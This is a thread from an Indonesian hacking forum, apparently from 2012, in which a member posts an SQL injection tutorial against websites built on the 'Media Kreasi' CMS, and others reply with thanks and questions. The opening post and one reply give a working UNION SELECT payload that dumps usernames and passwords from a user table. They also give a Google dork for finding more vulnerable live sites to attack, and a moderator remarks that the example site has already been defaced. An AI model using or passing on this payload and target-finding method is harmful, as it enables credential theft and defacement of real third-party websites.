Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-25-2013, 08:56 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 2 3 4 5 ... 15 Next »

[Tutor] Penerapan SQL Injecton pada "Media Kreasi"

Home General Computer Multimedia Business Lounge

Pages (3): 1 2 3 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor Penerapan SQL Injecton pada "Media Kreasi"
06-10-2012, 08:46 PM (This post was last modified: 06-10-2012 09:43 PM by anbu.)
Post: #1
momodrock Offline
./Devilz Musician .\m/
Posts: 551
Joined: Oct 2011
Reputation: 26
Penerapan SQL Injecton pada "Media Kreasi"
Penerapan SQL Injecton pada "Media Kreasi"


mohon maf sebelumnya kpada para seluruh pengurus & anggota devlzc0de, z ini smua ttg web lokal mohon klo sekiranya ini sangat melanggar rules, delete aja trit ane om,.. yg pnting ane jgn di banned piss
ini jg sbnarx tutor cupu yg cuma untuk org sperti ane,. mewek
tp cuma iseng2 mau ngetik2, jd bkin trit aja deh.. ngakak

exploit
target:
http://******/products/category/?id=13' <-- Vuln

disini kita tdk usah cari tahu isi table and column,
lgsung saja ketawa
cukup tambahkan "-" stelah "="
http://******/products/category/?id=-13
kmudian masukkan cheat.x hmmhmm
Quote:union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--
jadinya sprti ini:
Quote:http://******/products/category/?id=-13 union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--

udah gitu aja,..
tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi"

terserah mau plih target manapun..
cheat.x sama aja ngakak ngakak

sekian...
ngamuk jgn di depes, cukup beritahu admin web.x aja.. angel2
Visit this user's website Find all posts by this user
Quote this message in a reply
06-10-2012, 09:44 PM
Post: #2
anbu Offline
Naevy LunnyamouR
****
Global Moderators 		Posts: 3,297
Joined: Feb 2010
Reputation: 52
RE: Penerapan SQL Injecton pada "Media Kreasi"
maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget
Visit this user's website Find all posts by this user
Quote this message in a reply
06-10-2012, 09:52 PM (This post was last modified: 06-10-2012 09:58 PM by genta.)
Post: #3
genta Online
soutboxer
 		Posts: 974
Joined: Jan 2012
Reputation: 67
RE: Penerapan SQL Injecton pada "Media Kreasi"
cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon
Find all posts by this user
Quote this message in a reply
06-10-2012, 09:52 PM
Post: #4
tabun Offline
./Junk3r C4d3t
 		Posts: 1,801
Joined: Dec 2011
Reputation: 33
RE: Penerapan SQL Injecton pada "Media Kreasi"
keren jga.. mantap
ati2 tar ada singel defacer yg depes.. detektif
Find all posts by this user
Quote this message in a reply
06-10-2012, 09:59 PM
Post: #5
anharku Offline
./Devilz Advisor
 		Posts: 507
Joined: Jul 2010
Reputation: 29
RE: Penerapan SQL Injecton pada "Media Kreasi"
hm... lumayan buat belajar SQLi belajar
Find all posts by this user
Quote this message in a reply
06-10-2012, 10:17 PM (This post was last modified: 06-10-2012 10:20 PM by momodrock.)
Post: #6
momodrock Offline
./Devilz Musician .\m/
Posts: 551
Joined: Oct 2011
Reputation: 26
RE: Penerapan SQL Injecton pada "Media Kreasi"
(06-10-2012 09:44 PM)anbu Wrote:  maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget
iah om.. seneng thx

(06-10-2012 09:52 PM)genta Wrote:  cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon
ane jg kurang ngerti cara nulis om.. hmm
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-
di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34 ketawa

cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"

tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas.. seneng
om genta nih, seolah-olah g tau,.. padahal dia heker nangis
tabun
iahh, udah di antisipasi duluan sama om anbu seneng
anharku silahkan senior
Visit this user's website Find all posts by this user
Quote this message in a reply
06-10-2012, 10:21 PM (This post was last modified: 06-10-2012 10:22 PM by genta.)
Post: #7
genta Online
soutboxer
 		Posts: 974
Joined: Jan 2012
Reputation: 67
RE: Penerapan SQL Injecton pada "Media Kreasi"
(06-10-2012 10:17 PM)momodrock Wrote:  
(06-10-2012 09:44 PM)anbu Wrote:  maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget
iah om.. seneng thx

(06-10-2012 09:52 PM)genta Wrote:  cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon
ane jg kurang ngerti cara nulis om.. hmm
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-
di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34 ketawa

cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"

tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas.. seneng
om genta nih, seolah-olah g tau,.. padahal dia heker nangis
ane emank bener2 gak tau om nangis ,,,ama ane ini bukan heker om nohope..........ijin pelajari dulu om belajar
Find all posts by this user
Quote this message in a reply
06-10-2012, 10:34 PM
Post: #8
ToNhoW Offline
./Devilz 1st Cadet
 		Posts: 29
Joined: Mar 2012
Reputation: 0
RE: Penerapan SQL Injecton pada "Media Kreasi"
yang pepes pasti maho ngakak
Find all posts by this user
Quote this message in a reply
06-10-2012, 11:41 PM
Post: #9
Eyang Subur Away
cetar memBEHAhaha
****
 		Posts: 987
Joined: Apr 2010
Reputation: 22
RE: Penerapan SQL Injecton pada "Media Kreasi"
buat TS, ane kasih jempol deh mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
06-11-2012, 02:38 AM
Post: #10
ditatompel Offline
Administrator
*******
Administrators 		Posts: 2,168
Joined: Dec 2010
Reputation: 367
RE: Penerapan SQL Injecton pada "Media Kreasi"
Thanks omz.. Ijin pelajari dulu.. belajar
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): 1 2 3 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  DOS ip pada local area dengan ettercap dxfandy19 11 162 04-21-2013 02:19 PM
Last Post: ghosthands
  I can deface your Windows Media Player Dr.Localhost 6 246 12-09-2011 03:27 AM
Last Post: DC_Julianz
  Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root starzĀ³ 6 132 11-06-2011 01:46 AM
Last Post: Vanzoel
  kelemahan kernel<2.6.22 pada fungsi ftruncate (fs/open.c) mywisdom 5 108 06-27-2011 05:45 PM
Last Post: darkdante

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-25-2013, 08:56 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE